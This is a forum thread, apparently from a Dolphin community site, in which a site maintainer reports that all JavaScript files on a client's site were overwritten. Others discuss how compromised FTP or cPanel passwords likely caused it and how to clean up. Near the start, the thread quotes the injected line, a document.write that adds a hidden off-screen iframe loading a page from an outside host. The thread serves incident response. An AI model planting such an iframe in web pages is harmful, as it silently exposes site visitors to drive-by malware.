I was asked to take a look at a Dolphin website this morning; complaint was that certain links in the admin would not work. Upon inspection of the error console I saw many jquery errors being reported; one mentioned a closing tag for a function was missing so I went to take a look at the jquery directory. I immediately noticed that all the file sizes for the jquery files were wrong; some were way smaller than the correct file sizes. I downloaded one and opened it in an editor to examine and found the following:
document.write('<iframe src="http://satranuic.karaokebus.com/rigitusim16.khml" style="top:-999px;left:-999px;position:absolute;" height="135" width="135"></iframe>');
Has anyone else seen this exploit?
All the jquery file names were correct; so the exploit either rewrote the contents of the files or someone has set up a Dolphin exploit. I am leaning towards the virus; malware, attack scanning for .js files and rewriting the contents.
I quickly got out of the site and contacted the owner with the bad news. I am going to do a deep scan of my local system to make sure nothing got transferred locally; these new exploits can transfer in the background without you doing anything but visiting a page. If anyone has seen this before, let me know if there is anything specific I need to check on my local machine.
Geeks, making the world a better place |
a google of "satranuic" shows other sites that have been hit... one appears to be a dolphin site, ********singles.com... |
What I would like to know is how the infection occurred. I can easily fix the problem but if there is malware on the server that would overwrite the js files after I put the correct ones back in place, then it will just be replicated again. I have contacted the owner and informed them of the issue. They will need to contact their hosting company and ask for a scan of the server and see what turns up. Geeks, making the world a better place |
More likely the user or a FTP account was compromised and used to make the changes. Very rarely is the culprit something like malware on the server or an actual exploit in Dolphin. Still, a server scan isn't a bad idea, but those accounts need to have their passwords changed as soon as possible. The user should also scan their local computer for malware, which is sometimes how this happens. BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin |
The first thing I did was to tell the owner to change all passwords on the server and to make them correct passwords.
If this was a manual exploit, then it was set up specifically for a Dolphin site. Every, and I mean every, file in the jquery plugin directory had been changed; the file names were the same but the contents had been altered. I did not look at the js functions directory but I have a feeling they had been changed as well.
Geeks, making the world a better place |
I have been informed there was no malware found on the site; of course that does not mean the hosting company is not infected, they just scanned the client's files.
If not malware, then someone hacked into the site and replaced all the js files with infected ones. Quite possible, anyone can download the Dolphin zip files; make the necessary attack, then just ftp up the jquery directory with their infected files overwriting the ones on the server. If that is the case, I caution everyone to tighten the passwords on their ftp servers and control panels. I see way too often lax password practices when helping people..
Geeks, making the world a better place |
Update, every single js file; no matter where it was located, was infected. Every single one. Geeks, making the world a better place |
Most likely the cPanel or FTP account was compromised (weak password or a leaked password), and then all JS files were searched for and edited. I've seen this happen with JS files as well as index.php files before. The cause is almost always a weak cPanel account password or a temporary FTP account (with a weak password). BoonEx Certified Host: Zarconia.net - Fully Supported Shared and Dedicated for Dolphin |
looking at the log files for activity that matches the date of the mod date of the infected files might shed some light....
|
Also it may be that someone who had access (or maybe still have it) to the site via ftp and/or cpanel saved the password in the browser or FTP client, then local computer was infected and all saved password were stolen by the virus, later stolen accounts were used to upload the same virus to the website.
I would suggest to change passwords immediately, in the future try to not save passwords in FTP/browser which store password in clear text or using weak encryption. Ask everyone who could have access to the site to check their computers for viruses with the latest Antivirus database.
What I would like to know is how the infection occurred.
Rules → http://www.boonex.com/terms |
